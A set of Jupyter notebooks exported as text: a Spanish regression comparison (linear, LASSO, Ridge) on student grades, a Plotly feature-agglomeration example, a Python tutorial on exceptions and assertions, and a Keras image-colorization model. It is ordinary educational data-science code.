#Graficamos los errores cuadráticos
Y_ECM= np.repeat(ECM_lin, len(err_cuad))
plt.scatter(Y_test, err_cuad, color = 'blue')
plt.plot(Y_test,Y_ECM , color = 'lime') #Recta en Y = err_cuad_medio
plt.title('Errores cuadráticos: (real − estimado)^2')
plt.xlabel('Calificación real')
plt.ylabel('Errores cuadráticos')
plt.show()
###Output
3.16
###Markdown
LASSO
###Code
# Definimos el vector de lambdas, recordemos que el string 'lambda' está reservado para
lambdas = 10**np.linspace(10,-2,100)*0.5
#Para estandarizar las variables el parámetro "normalize" es verdadero.
#Se define el máximo número de iteraciones en 10 mil
lasso = Lasso(max_iter = 10000, normalize = True)
coefs = []
for k in lambdas:
lasso.set_params(alpha = k)
lasso.fit(scale(X_train), Y_train)
coefs.append(lasso.coef_)
np.shape(coefs)#Matriz con coeficientes asociadas a cada variable independiente y a cada valor de lambda
## 5) CONSTRUIR UN MODELO
# Vamos a elegir lambda con "cross validation"
lassocv = LassoCV(alphas = None, cv = 10, max_iter = 100000, normalize = True)
lassocv.fit(X_train, Y_train)
#Se imprimen los valores de los coeficientes
print(pd.Series(lassocv.coef_, index = X.columns)) # Valor de los coeficientes
# Se grafican los valores de los coeficientes (betas).
eje_X = range(1,len(lassocv.coef_)+1,1)
plt.scatter(eje_X, lassocv.coef_, color = 'purple')
plt.title('Betas')
plt.xlabel('Índices')
plt.ylabel('Valor de coeficientes')
plt.show()
###Output
_____no_output_____
###Markdown
Interpretación de los coeficientes
###Code
## 6) PREDICCIONES
# Se hacen las predicciones con "X_test"
lasso.set_params(alpha=lassocv.alpha_)
print('El valor de lambda encontrado con "cross validation" es: ',round(lassocv.alpha_,3))
lasso.fit(X_train, Y_train)
Y_pred_lasso = lasso.predict(X_test)
# Se grafican los resultados de la predicción.
plt.scatter(Y_test, Y_pred_lasso, color = 'blue')
plt.title('Predicciones')
plt.xlabel('Calificaciones reales')
plt.ylabel('Calificaciones estimadas')
plt.show()
###Output
El valor de lambda encontrado con "cross validation" es: 0.006
###Markdown
7) EVALUACIÓN DEL MODELOVeamos cómo se comporta el modelo:7.1 Calcular $R^{2}$ ajustada $ = 1 - \dfrac{(1 - R^{2}) (n-1)}{n - p - 1}$, donde$R^{2}:$ R cuadrada de los datos$n:$ Número de datos para entrenar al modelo$p:$ Número de variables independientes7.2 Calcular los errores absolutos $(real - estimado)$ y graficarlos7.3 Calcular los errores relativos $\left( \dfrac{\text{real - estimado}}{\text{real}} \right)$ y graficarlos7.4 Graficar valores estimados vs valores reales7.5 Calcular el error cuadrático: $(real − estimado)^{2}$7.6 Calcular el error cuadrático medio: $\dfrac{\displaystyle \sum_{i = 1}^{n} (real_{i} − estimado_{i})^{2}}{n}$
###Code
#7.1 Calcular R^2 ajustada
r_cuad_lasso = r2_score(Y_test,Y_pred_lasso)
print('R^2 = ',round(r_cuad_lasso,3))
#R^2 ajustada
n = len(Y_train)
p = X_train.shape[1]
r_cuad_aj_lasso = 1 - (((1-r_cuad_lasso)*(n-1))/(n-p-1))
print('n = ',n)
print('p = ',p)
print('R^2_aj = ',round(r_cuad_aj_lasso,3))
#7.2 Calcular los errores absolutos (real - estimado) y graficarlos
err_abs = Y_test-Y_pred_lasso
plt.scatter(Y_test, err_abs, color = 'blue')
plt.plot(Y_test, np.zeros(len(err_abs)), color = 'midnightblue') #Recta en Y = 0
plt.title('Errores absolutos (real - estimado)')
plt.xlabel('Calificación real')
plt.ylabel('Errores absolutos')
plt.show()
#7.3 Calcular los errores relativos [(real - estimado)/real] y graficarlos
err_rel = err_abs/Y_test
plt.scatter(Y_test, err_rel, color = 'blue')
plt.plot(Y_test, np.zeros(len(err_abs)), color = 'midnightblue') #Recta en Y = 0
plt.title('Errores relativos [(real - estimado)/real]')
plt.xlabel('Calificación real')
plt.ylabel('Errores relativos')
plt.show()
#7.4 Graficar valores estimados vs valores reales
eje_X = range(1,len(Y_test)+1)
plt.plot(eje_X, sorted(Y_test), color = 'black') #Recta de valores reales
plt.plot(eje_X, sorted(Y_pred_lasso), color = 'red') #Recta de valores estimados
plt.title('Valores estimados vs valores reales')
plt.xlabel('Índices')
plt.ylabel('Calificación')
plt.show()
#Nota: Tanto los valores reales como los estimados se ordenaron de menor a mayor.
#7.4 Graficar valores estimados vs valores reales
eje_X = range(1,len(Y_test)+1)
plt.plot(eje_X, sorted(Y_test), color = 'black') #Recta de valores reales
plt.plot(eje_X, sorted(Y_pred_lasso), color = 'red') #Recta de valores estimados con LASSO
plt.plot(eje_X, sorted(Y_pred_lin), color = 'blue') #Recta de valores estimados con regresión lineal múltiple
plt.title('Valores estimados vs valores reales')
plt.xlabel('Índices')
plt.ylabel('Calificación')
plt.show()
#7.5 Calcular el error cuadrático = (real − estimado)^2
#print(np.around(err_abs,2))
err_cuad = pow(err_abs,2)
#7.6 Calcular el error cuadrático medio = (1/n) * \sum (real − estimado)^2
ECM_lasso = mean_squared_error(Y_test, Y_pred_lasso)
print(round(ECM_lasso,2))
#Graficamos los errores cuadráticos
Y_ECM= np.repeat(ECM_lasso, len(err_cuad))
plt.scatter(Y_test, err_cuad, color = 'blue')
plt.plot(Y_test,Y_ECM , color = 'lime') #Recta en Y = err_cuad_medio
plt.title('Errores cuadráticos: (real − estimado)^2')
plt.xlabel('Calificación real')
plt.ylabel('Errores cuadráticos')
plt.show()
###Output
2.97
###Markdown
Conclusiones
###Code
print("Regresión Lineal Múltiple:")
print("R^2 ajustada = ",round(r_cuad_aj_lin,3)," ECM = ",round(ECM_lin,3))
print("\nLASSO:")
print("R^2 ajustada = ",round(r_cuad_aj_lasso,3)," ECM = ",round(ECM_lasso,3))
###Output
Regresión Lineal Múltiple:
R^2 ajustada = 0.753 ECM = 3.158
LASSO:
R^2 ajustada = 0.768 ECM = 2.967
###Markdown
Al comparar ambos modelos con el error cuadrático medio y con $R^{2}$ ajustada, se elige _LASSO Regression_.Las variables que se hicieron cero en LASSO son: - traveltime - studytime - Dalc - Walc - address_U - Pstatus_T - schoolsup_yes - famsup_yes - paid_yes - internet_yes ¿Qué se puede decir de dichos resultados? ¿Qué otras variables se podrían agregar al modelo? - school - sex - famsize - Medu - Fedu - Mjob - Fjob - reason - guardian - nursery - higher - famrel
###Code
# Se define un nuevo dataframe:
X2 = df[['school','sex','famsize','Medu','Fedu','Mjob','Fjob','reason','guardian','nursery',
'age','romantic','higher','famrel','G1','G2']]
print(X2.shape)
X2.head()
#Se definen las variables dummies para las variables categóricas
dummies = pd.get_dummies(X2[['school', 'sex','famsize','Mjob','Fjob','reason','guardian','nursery','romantic','higher']])
dummies.head()
#Se reemplazan por las variables dummies
X2 = X2.drop(['school', 'sex','famsize','Mjob','Fjob','reason','guardian','nursery','romantic',
'higher'], axis = 1).astype('float64')
X2 = pd.concat([X2, dummies[['school_GP','sex_F','famsize_GT3',
'Mjob_at_home','Mjob_health','Mjob_services','Mjob_teacher',
'Fjob_at_home','Fjob_health','Fjob_services','Fjob_teacher',
'reason_course','reason_home','reason_reputation',
'guardian_father','guardian_mother','nursery_yes','romantic_yes','higher_yes']]], axis = 1)
X2.head()
#Se muestra la correlación entre la calificación y las variables predictivas
for i in [0,3]:
sns.pairplot(data=df,
y_vars=['G3'],
x_vars=['G3',X2.columns[i], X2.columns[i+1], X2.columns[i+2]])
plt.show()
#No se muestran las gráficas de las columnas con variables dummies
## 4) DIVIDIR LOS DATOS
X_train, X_test, Y_train, Y_test = train_test_split(X2, Y,test_size = 0.2,random_state = 0)
###Output
_____no_output_____
###Markdown
Ridge Regression
###Code
## 5) CONSTRUIR UN MODELO
#Le pasamos como parámetro el vector con los diferentes valores de lambda para que
#se elija la mejor con "cross validation"
ridgecv = RidgeCV(alphas = lambdas, scoring = 'neg_mean_squared_error', normalize = True)
ridgecv.fit(X_train, Y_train)
print('El valor de lambda encontrado con "cross validation" es: ',round(ridgecv.alpha_,3))
#Verificamos que el valor encontrado está en el vector de lambdas
ridgecv.alpha_ in lambdas
#Se imprimen los valores de los coeficientes
mod_ridgeCV = Ridge(alpha = ridgecv.alpha_, normalize = True)
mod_ridgeCV.fit(X_train, Y_train)
print(pd.Series(mod_ridgeCV.coef_, index = X2.columns)) # Valor de los coeficientes
# Se grafican los valores de los coeficientes (betas).
eje_X = range(1,len(mod_ridgeCV.coef_)+1,1)
plt.scatter(eje_X, mod_ridgeCV.coef_, color = 'purple')
plt.title('Betas')
plt.xlabel('Índices')
plt.ylabel('Valor de coeficientes')
plt.show()
###Output
_____no_output_____
###Markdown
Interpretación de los coeficientes
###Code
## 6) PREDICCIONES
Y_pred_ridge = mod_ridgeCV.predict(X_test)
# Se grafican los resultados de la predicción.
plt.scatter(Y_test, Y_pred_ridge, color = 'blue')
plt.title('Predicciones')
plt.xlabel('Calificaciones reales')
plt.ylabel('Calificaciones estimadas')
plt.show()
## 7) EVALUACIÓN DEL MODELO
#7.1 Calcular R^2 ajustada
r_cuad_ridge = r2_score(Y_test,Y_pred_ridge)
print('R^2 = ',round(r_cuad_ridge,3)) #Porcentaje de los datos explicados por el modelo
#R^2 ajustada
n = len(Y_train)
p = X_train.shape[1]
r_cuad_aj_ridge = 1 - (((1-r_cuad_ridge)*(n-1))/(n-p-1))
print('n = ',n)
print('p = ',p)
print('R^2_aj = ',round(r_cuad_aj_ridge,3))
#Calculamos el error cuadrático medio: $\dfrac{\displaystyle \sum_{i = 1}^{n} (real_{i} − estimado_{i})^{2}}{n}$
ECM_ridge = round(mean_squared_error(Y_test, Y_pred_ridge),3)
print(ECM_ridge)
print("Regresión Lineal Múltiple:")
print("R^2 ajustada = ",round(r_cuad_aj_lin,3)," ECM = ",round(ECM_lin,3))
print("\nLASSO:")
print("R^2 ajustada = ",round(r_cuad_aj_lasso,3)," ECM = ",round(ECM_lasso,3))
print("\nRidge:")
print("R^2 ajustada = ",round(r_cuad_aj_ridge,3)," ECM = ",round(ECM_ridge,3))
###Output
Regresión Lineal Múltiple:
R^2 ajustada = 0.753 ECM = 3.158
LASSO:
R^2 ajustada = 0.768 ECM = 2.967
Ridge:
R^2 ajustada = 0.784 ECM = 5.496
###Markdown
Combinación lineal de las predicciones
###Code
Y_pred_1 = (0.4*Y_pred_ridge) + (0.6*Y_pred_lasso) + (0*Y_pred_lin)
# Valores estimados vs valores reales
eje_X = range(1,len(Y_test)+1)
plt.plot(eje_X, sorted(Y_test), color = 'black') #Recta de valores reales
plt.plot(eje_X, sorted(Y_pred_1), color = 'red') #Recta de valores estimados
plt.title('Valores estimados vs valores reales')
plt.xlabel('Índices')
plt.ylabel('Calificación')
plt.show()
#Nota: Tanto los valores reales como los estimados se ordenaron de menor a mayor.
## 7) EVALUACIÓN DEL MODELO
#Calculamos el error cuadrático medio: $\dfrac{\displaystyle \sum_{i = 1}^{n} (real_{i} − estimado_{i})^{2}}{n}$
ECM_1 = round(mean_squared_error(Y_test, Y_pred_1),3)
print(ECM_1)
Y_pred_2 = (0*Y_pred_ridge) + (0.4*Y_pred_lasso) + (0.6*Y_pred_lin)
# Valores estimados vs valores reales
eje_X = range(1,len(Y_test)+1)
plt.plot(eje_X, sorted(Y_test), color = 'black') #Recta de valores reales
plt.plot(eje_X, sorted(Y_pred_2), color = 'red') #Recta de valores estimados
plt.title('Valores estimados vs valores reales')
plt.xlabel('Índices')
plt.ylabel('Calificación')
plt.show()
#Nota: Tanto los valores reales como los estimados se ordenaron de menor a mayor.
## 7) EVALUACIÓN DEL MODELO
#Calculamos el error cuadrático medio: $\dfrac{\displaystyle \sum_{i = 1}^{n} (real_{i} − estimado_{i})^{2}}{n}$
ECM_2 = round(mean_squared_error(Y_test, Y_pred_2),3)
print(ECM_2)
Y_pred_3 = (0.5*Y_pred_ridge) + (0.4*Y_pred_lasso) + (0.1*Y_pred_lin)
## 7) EVALUACIÓN DEL MODELO
#Calculamos el error cuadrático medio: $\dfrac{\displaystyle \sum_{i = 1}^{n} (real_{i} − estimado_{i})^{2}}{n}$
ECM_3 = round(mean_squared_error(Y_test, Y_pred_3),3)
print(ECM_3)
###Output
16.004
###Markdown
Encontremos los pesos óptimos minimizando el error cuadrático medio
###Code
#Se define una función que calcula los pesos para la combinación lineal de los modelos
def objective(weights,train_predictions,y_train):
y_ens = np.average(train_predictions, axis=1, weights=weights)
return mean_squared_error(y_train, y_ens)
#Se define una matriz con los valores de las predicciones de los modelos
train_predictions = np.concatenate([Y_pred_ridge[:, None],
Y_pred_lasso[:, None],
Y_pred_lin[:,None]], axis=1)
#Se definen los pesos iniciales
w0 = [0.2,0.5,0.3]
#Se definen las cotas para los pesos (deben de estar entre 0 y 1)
bounds = [(0,1)] * train_predictions.shape[1]
#Se definen las restirrciones: La suma de los pesos debe de ser igual a 1
cons = [{'type': 'eq','fun': lambda w: w.sum() - 1}]
#Se utiliza la función "minimize" para minimizar la función objetivo (minimizar el ECM)
#El método "SLSQP" permite definir restricciones
res = minimize(objective,
w0,
args = (train_predictions,Y_test),
method='SLSQP',
bounds=bounds,
options={'disp':True, 'maxiter':10000},
constraints=cons)
pesos_opt = res.x
print('\nPesos Óptimos:')
print('Ridge: {:.4f}'.format(pesos_opt[0]))
print('LASSO: {:.4f}'.format(pesos_opt[1]))
print('Regresión Lineal: {:.4f}'.format(pesos_opt[2]))
Y_pred_4 = (pesos_opt[0]*Y_pred_ridge) + (pesos_opt[1]*Y_pred_lasso) + (pesos_opt[2]*Y_pred_lin)
## 7) EVALUACIÓN DEL MODELO
#Calculamos el error cuadrático medio: $\dfrac{\displaystyle \sum_{i = 1}^{n} (real_{i} − estimado_{i})^{2}}{n}$
ECM_4 = round(mean_squared_error(Y_test, Y_pred_4),3)
print(ECM_4)
###Output
5.496
###Markdown
Conclusiones
###Code
print("Regresión Lineal Múltiple:")
print("R^2 ajustada = ",round(r_cuad_aj_lin,3)," ECM = ",round(ECM_lin,3))
print("\nLASSO:")
print("R^2 ajustada = ",round(r_cuad_aj_lasso,3)," ECM = ",round(ECM_lasso,3))
print("\nRidge:")
print("R^2 ajustada = ",round(r_cuad_aj_ridge,3)," ECM = ",round(ECM_ridge,3))
print("\nCombinación lineal 1:")
print("ECM = ",round(ECM_1,3))
print("\nCombinación lineal 2:")
print("ECM = ",round(ECM_2,3))
print("\nCombinación lineal 3:")
print("ECM = ",round(ECM_3,3))
print("\nCombinación lineal óptima:")
print("ECM = ",round(ECM_4,3))
###Output
Regresión Lineal Múltiple:
R^2 ajustada = 0.753 ECM = 3.158
LASSO:
R^2 ajustada = 0.768 ECM = 2.967
Ridge:
R^2 ajustada = 0.784 ECM = 5.496
Combinación lineal 1:
ECM = 20.0
Combinación lineal 2:
ECM = 43.63
Combinación lineal 3:
ECM = 16.004
Combinación lineal óptima:
ECM = 5.496
|
_posts/scikit/feature-agglomeration/Feature agglomeration.ipynb | ###Markdown
New to Plotly?Plotly's Python library is free and open source! [Get started](https://plot.ly/python/getting-started/) by downloading the client and [reading the primer](https://plot.ly/python/getting-started/).You can set up Plotly to work in [online](https://plot.ly/python/getting-started/initialization-for-online-plotting) or [offline](https://plot.ly/python/getting-started/initialization-for-offline-plotting) mode, or in [jupyter notebooks](https://plot.ly/python/getting-started/start-plotting-online).We also have a quick-reference [cheatsheet](https://images.plot.ly/plotly-documentation/images/python_cheat_sheet.pdf) (new!) to help you get started! Version
###Code
import sklearn
sklearn.__version__
###Output
_____no_output_____
###Markdown
Imports
###Code
print(__doc__)
import plotly.plotly as py
import plotly.graph_objs as go
from plotly import tools
import numpy as np
import matplotlib.pyplot as plt
from sklearn import datasets, cluster
from sklearn.feature_extraction.image import grid_to_graph
###Output
Automatically created module for IPython interactive environment
###Markdown
Calculations
###Code
digits = datasets.load_digits()
images = digits.images
X = np.reshape(images, (len(images), -1))
connectivity = grid_to_graph(*images[0].shape)
agglo = cluster.FeatureAgglomeration(connectivity=connectivity,
n_clusters=32)
agglo.fit(X)
X_reduced = agglo.transform(X)
X_restored = agglo.inverse_transform(X_reduced)
images_restored = np.reshape(X_restored, images.shape)
###Output
_____no_output_____
###Markdown
Plot Result
###Code
fig = tools.make_subplots(rows=3, cols=4,
print_grid=False,
subplot_titles = ('','Original Data','','',
'','Agglomerated Data','','',
'Labels'),
specs=[[{}, {}, {}, {}],
[{}, {}, {}, {}],
[None, {}, None, None]
])
def matplotlib_to_plotly(cmap, pl_entries):
h = 1.0/(pl_entries-1)
pl_colorscale = []
for k in range(pl_entries):
C = map(np.uint8, np.array(cmap(k*h)[:3])*255)
pl_colorscale.append([k*h, 'rgb'+str((C[0], C[1], C[2]))])
return pl_colorscale
for i in range(4):
original = go.Heatmap(z=images[i], showscale=False,
colorscale=matplotlib_to_plotly(plt.cm.gray,
len(images[i])))
fig.append_trace(original, 1, i+1)
agglomerated = go.Heatmap(z=images_restored[i],
showscale=False,
colorscale=matplotlib_to_plotly(plt.cm.gray,
len(images_restored[i])))
fig.append_trace(agglomerated , 2, i+1)
labels = go.Heatmap(z=np.reshape(agglo.labels_, images[0].shape),
showscale=False,
colorscale=matplotlib_to_plotly(plt.cm.spectral,
len(np.reshape(agglo.labels_, images[0].shape))))
fig.append_trace(labels , 3, 2)
fig['layout'].update(height=900)
for i in map(str,range(1,10)):
y = 'yaxis'+i
x = 'xaxis'+i
fig['layout'][y].update(autorange='reversed',
showticklabels=False, ticks='')
fig['layout'][x].update(showticklabels=False, ticks='')
py.iplot(fig)
###Output
_____no_output_____
###Markdown
License Code source: Gaël Varoquaux Modified for documentation by Jaques GroblerLicense: BSD 3 clause
###Code
from IPython.display import display, HTML
display(HTML('<link href="//fonts.googleapis.com/css?family=Open+Sans:600,400,300,200|Inconsolata|Ubuntu+Mono:400,700" rel="stylesheet" type="text/css" />'))
display(HTML('<link rel="stylesheet" type="text/css" href="http://help.plot.ly/documentation/all_static/css/ipython-notebook-custom.css">'))
! pip install git+https://github.com/plotly/publisher.git --upgrade
import publisher
publisher.publish(
'Feature agglomeration.ipynb', 'scikit-learn/plot_digits_agglomeration/', 'Feature Agglomeration | plotly',
' ',
title = 'Feature Agglomeration | plotly',
name = 'Feature Agglomeration',
has_thumbnail='true', thumbnail='thumbnail/feature-agglomeration.jpg',
language='scikit-learn', page_type='example_index',
display_as='clustering', order=2,
ipynb= '~Diksha_Gabha/2749')
###Output
_____no_output_____ |
notebooks/12_exception_handling.ipynb | ###Markdown
ErrorsErrors are messages being raised when python finds itself in a situation it isn't supposed to be in.For example, when we forget to close a bracket or make any mistake concerning the language's syntax, we will raise a *SyntaxError*.
###Code
if True print('something') # we get a SyntaxError
###Output
_____no_output_____
###Markdown
When trying to use a variable we haven't assigned, we raise a *NameError*.
###Code
print(a) # we get a NameError
###Output
_____no_output_____
###Markdown
When trying to perform an operation that is not supported for the objects we are trying to use it on, we raise a *TypeError*.
###Code
'a' + 3 # we get a TypeError
###Output
_____no_output_____
###Markdown
When passing an index to a list that is out of its range, we raise an *IndexError*.
###Code
l = [0, 1, 2]
l[3]
###Output
_____no_output_____
###Markdown
When referencing a dictionary key that does not exist, we raise a *KeyError*.
###Code
d = {'a': 1, 'b': 2}
d['c']
###Output
_____no_output_____
###Markdown
When attempting to divide by zero (in regular python), we will raise a *ZeroDivisionError*.
###Code
1/0 # we get a ZeroDivisionError
###Output
_____no_output_____
###Markdown
and so on...These different types of errors exist to inform us on what **kind** of mistake we made. It is important to differentiate between two types of errors:- **SyntaxErrors** are errors the interpreter finds when it is trying to parse the commands given to him. These errors are fatal for the execution of the script. These errors need to be corrected!- Errors that occur **during execution** are known as **exceptions** and can be **handled**!Handling of exceptions is done with the `try...except` block. This block consists of two parts: The `try` block contains all the commands we want python to **try** to execute. **If** an error occurs, the rest of the commands in the `try` block are skipped and python starts executing the commands in the `except` block. If no error is found, python performs all commands in the `try` block but **ignores** the `except` block.Syntax is:```pythontry: Operations we want python to try to execute. If an 'ErrorName' type error is encountered, python skips the rest of the commands in the try blockexcept ErrorName: Operations we want executed IF python encounters an error of the 'ErrorName' type.``` Example 1We want the user to enter a number from the keyboard:
###Code
while True:
try:
# under this line we put the commands we want python to try to perform
x = int(input('Please enter a number: '))
# here we want the user to enter something from the keyboard and then we try to convert this to an integer
# if it is not a number the casting cannot be performed and we will have raised a ValueError
break
# if we didn't raise an error the next command will be performed (which exits the while loop)
except ValueError:
# This command is how we 'catch' errors. This means that if we raised a ValueError, python skips the rest
# of the try block and performs the commands of the except block!
print('Not a valid number, try again!')
# if we want to just ignore the error (and not print anything like here) we can just use pass
###Output
Please enter a number: a
Not a valid number, try again!
Please enter a number: '5'
Not a valid number, try again!
Please enter a number: 5
###Markdown
There are many ways of handling exceptions in python, using the `try...except` block.- Multiple exceptions:```pythontry: ...except(RuntimeError, TypeError, NameError): ...```- Refering to exceptions in a different way (and handling them): - In python 3:```pythontry: ...except ValueError as ve: refers to the instance of the ValueError exception we caught as 've' print(type(ve)) print(ve.args) prints the arguments of the error print(ve) prints the __str__() method of the ValueError class ...``` - In python 2:```pythontry: ...except ValueError, ve: same exact thing as above ...``` - Ingnore all exceptions:```pythontry: ...except: catches all exceptions pass ignores them```**Broad except clauses like the above are not recommended**. Raising exceptions.The `raise` statement allows the programmer to force a specified exception to occur.Syntax is:```pythonraise ErrorName(arguments)```
###Code
raise NameError('my error')
###Output
_____no_output_____
###Markdown
The argument in raise indicates the exception to be raised. This **must** be either an **exception instance** or an **exception class** (a class that derives from Exception). Defining ExceptionsSometimes it is useful to define our own `type` of error. This can be done by creating a class that **derives from python's Exception class** either directly, or indirectly.```pythonclass CustomError(Exception): ...```
###Code
class MyError(Exception):
# A user-defined exception must be derived directly or indirectly from the Exception class.
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
raise MyError('muahaha!')
###Output
_____no_output_____
###Markdown
AssertionsThe `assert` statement helps the programmer find bugs and ensure his program is used the way he meant it to be used. The assert statements tests a condition, if it is `True` it continues; if it is `False`, it raises an **AssertionError**.```pythonassert condition, arguments```The arguments are optional and are passed as arguments to the `AssertionError()` exception.Assert is roughly equivalent to:```pythonif not condition: raise AssertionError(arguments)```
###Code
cnd1 = (5 == 5) # True
cnd2 = (5 == '5') # False
assert cnd1, 'Failed condition 1!' # does nothing
assert cnd2, 'Failed condition 2!' # raises an AssertionError
###Output
_____no_output_____
###Markdown
For nother example of an assertion, we will check if a user-defined exception class (that we call `err`), is a valid python `Exception`:
###Code
err = MyError
assert issubclass(err, Exception), '{} is not a suitable class for an exception, ' \
'because {} is not derived from class Exception'.format(err.__name__, err.__name__)
###Output
_____no_output_____ |
Final .ipynb | ###Markdown
Load all required libraries Summary - - Numpy for stacking images in an array- OpenCV for image restoration- Matplotlib for general plotting tasks- Skimage for image restoration- Pandas for general python data manipulations- Random for selecting random images from dataset for testing colorization feature- PIL for Image manipulation- OS for file manipulation, etc.- TensorFlow for foundational support with creation of deep learning model- Keras for high-level experimentation with deep learning model
###Code
#import libraries
import numpy as np
import cv2 as cv
from matplotlib import pyplot as plt
import skimage
from skimage import io
import pandas as pd
import random
from PIL import Image
import skimage
from skimage.transform import resize
from skimage.color import rgb2lab
import os
import tensorflow as tf
from tensorflow.keras.applications import MobileNetV2
from tensorflow.keras.models import Model, Sequential, load_model
from tensorflow.keras.layers import Conv2D, Conv2DTranspose, Reshape, Dropout, LeakyReLU, BatchNormalization, Input, Concatenate, Activation, concatenate
from tensorflow.keras.initializers import RandomNormal
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.utils import plot_model
###Output
_____no_output_____
###Markdown
Define structure for a convolutional encoder-decoder deep learning model that colorizes grayscale imagesThe main inspiration for this approach was this paper published in 2017 - https://arxiv.org/abs/1712.03400 The below code block does following actions -- Randomly initialize the weights for our neural network (to satisfy the expectation of SGD i.e. Stochastic Gradient Descent)- Initialize an input layer that takes in images of the size 224 by 224 pixels- Use the pretrained (imagenet data) neural network MobileNetV2 for high-level feature extraction- Dropouts are implemented to prevent overfitting (this is done by dropping neurons at certain stages to train different neural networks each time)- The output layer is configured for A and B channels (intended to be merged with the L channel) of our input images
###Code
# build a network for training on our dataset, use the pretrained MobileNet for deep layers
# prepare the kernel initializer values
weight_init = RandomNormal(stddev=0.02)
# prepare the Input layer
net_input = Input((224,224,3))
# download mobile net, and use it as the base.
mobile_net_base = MobileNetV2(include_top=False, input_shape=(224,224,3), weights='imagenet')
mobilenet = mobile_net_base(net_input)
# encoder block #
# 224x224
conv1 = Conv2D(64, (3, 3), strides=(2, 2), padding='same', kernel_initializer=weight_init)(net_input)
conv1 = LeakyReLU(alpha=0.2)(conv1)
# 112x112
conv2 = Conv2D(128, (3, 3), strides=(1, 1), padding='same', kernel_initializer=weight_init)(conv1)
conv2 = LeakyReLU(alpha=0.2)(conv2)
# 112x112
conv3 = Conv2D(128, (3, 3), strides=(2, 2), padding='same', kernel_initializer=weight_init)(conv2)
conv3 = Activation('relu')(conv3)
# 56x56
conv4 = Conv2D(256, (3, 3), strides=(2, 2), padding='same', kernel_initializer=weight_init)(conv3)
conv4 = Activation('relu')(conv4)
# 28x28
conv4_ = Conv2D(256, (3, 3), strides=(1, 1), padding='same', kernel_initializer=weight_init)(conv4)
conv4_ = Activation('relu')(conv4_)
# 28x28
conv5 = Conv2D(512, (3, 3), strides=(2, 2), padding='same', kernel_initializer=weight_init)(conv4_)
conv5 = Activation('relu')(conv5)
# 14x14
conv5_ = Conv2D(256, (3, 3), strides=(2, 2), padding='same', kernel_initializer=weight_init)(conv5)
conv5_ = Activation('relu')(conv5_)
#7x7
# fusion layer - connect MobileNet with our encoder
conc = concatenate([mobilenet, conv5_])
fusion = Conv2D(512, (1, 1), padding='same', kernel_initializer=weight_init)(conc)
fusion = Activation('relu')(fusion)
# skip fusion layer
skip_fusion = concatenate([fusion, conv5_])
# decoder block #
# 7x7
decoder = Conv2DTranspose(512, (3, 3), strides=(2, 2), padding='same', kernel_initializer=weight_init)(skip_fusion)
decoder = Activation('relu')(decoder)
decoder = Dropout(0.25)(decoder)
# skip layer from conv5 (with added dropout)
skip_4_drop = Dropout(0.25)(conv5)
skip_4 = concatenate([decoder, skip_4_drop])
# 14x14
decoder = Conv2DTranspose(256, (3, 3), strides=(2, 2), padding='same', kernel_initializer=weight_init)(skip_4)
decoder = Activation('relu')(decoder)
decoder = Dropout(0.25)(decoder)
# skip layer from conv4_ (with added dropout)
skip_3_drop = Dropout(0.25)(conv4_)
skip_3 = concatenate([decoder, skip_3_drop])
# 28x28
decoder = Conv2DTranspose(128, (3, 3), strides=(2, 2), padding='same', kernel_initializer=weight_init)(skip_3)
decoder = Activation('relu')(decoder)
decoder = Dropout(0.25)(decoder)
# 56x56
decoder = Conv2DTranspose(64, (3, 3), strides=(2, 2), padding='same', kernel_initializer=weight_init)(decoder)
decoder = Activation('relu')(decoder)
decoder = Dropout(0.25)(decoder)
# 112x112
decoder = Conv2DTranspose(64, (3, 3), strides=(1, 1), padding='same', kernel_initializer=weight_init)(decoder)
decoder = Activation('relu')(decoder)
# 112x112
decoder = Conv2DTranspose(32, (3, 3), strides=(2, 2), padding='same', kernel_initializer=weight_init)(decoder)
decoder = Activation('relu')(decoder)
# 224x224
# output layer, with 2 channels (a and b)
output_layer = Conv2D(2, (1, 1), activation='tanh')(decoder)
###Output
_____no_output_____
###Markdown
Configure model to be optimized using Adam optimizer, specified learning rate and mean-squared error loss- This step loads the weights derived upon training our deep learning model for 100 epochs on the entire MIRFLICKR25k dataset (in batches of 3000 each)
###Code
# configure model
model = Model(net_input, output_layer)
model.compile(Adam(lr=0.0002), loss='mse', metrics=['accuracy'])
# load weights
model.load_weights('trained_on_all_is_for_100_es.h5')
###Output
_____no_output_____
###Markdown
Define all functions for getting predictions and constructing complete colorized RGB image based on LAB inputs
###Code
def get_pred(model, image_l):
"""
Summary -
This function generates the predicted A and B channels of the colorized image
:param model: Trained model
:type model: tensorflow.python.keras.engine.training.Model
:param image_l: The L channel of the input grayscale image
:type image_l: numpy.ndarray
:return: Predicted A and B channels of the input grayscale image
:rtype: numpy.ndarray
"""
# repeat the L value to match input shape
image_l_R = np.repeat(image_l[..., np.newaxis], 3, -1)
image_l_R = image_l_R.reshape((1, 224, 224, 3))
# normalize the input
image_l_R = (image_l_R.astype('float32') - 127.5) / 127.5
# make prediction
prediction = model.predict(image_l_R)
# normalize the output
pred = (prediction[0].astype('float32') * 127.5) + 127.5
return pred
def get_LAB(image_l, image_ab):
"""
Summary -
This function generates the compiled RGB equivalent of the inputted L plus the predicted A and B channels
:param image_l: Grayscale image (1 layer, L)
:type image_l: numpy.ndarray
:param image_ab: Predicted image (2 layers, A and B)
:type image_ab: numpy.ndarray
:return: Compiled image (3 layers, RGB)
:rtype: numpy.ndarray
"""
image_l = image_l.reshape((224, 224, 1))
image_lab = np.concatenate((image_l, image_ab), axis=2)
image_lab = image_lab.astype("uint8")
image_rgb = cv.cvtColor(image_lab, cv.COLOR_LAB2RGB)
image_rgb = Image.fromarray(image_rgb)
return image_rgb
def create_sample(model, image_gray):
"""
Summary -
This function creates the output we need from colorization
:param model: Trained model
:type model: tensorflow.python.keras.engine.training.Model
:param image_gray: Grayscale image (1 layer, L)
:type image_gray: numpy.ndarray
:return: Result image
:rtype: numpy.ndarray
"""
# get the model's prediction
pred = get_pred(model, image_gray)
# combine input and output to LAB image
image = get_LAB(image_gray, pred)
# create new combined image, save it
new_image = Image.new('RGB', (224, 224))
new_image.paste(image, (0, 0))
return new_image
# Define function for
def show_image(Selection,l,i):
"""
Summary -
Selects the image based on user choice and sends it to the deep learning model for processing
:param Selection: Image label chosen by user
:type model: String
:param l: list of labels
:type l: list
:param i: list of processed images
:type i: list
"""
index = l.index(Selection)
img = i[index]
mod_img = resize(rgb2lab(img.copy())[:,:,0], (224,224), anti_aliasing=True)
sample = create_sample(model, mod_img)
sample.save('output/output.jpg')
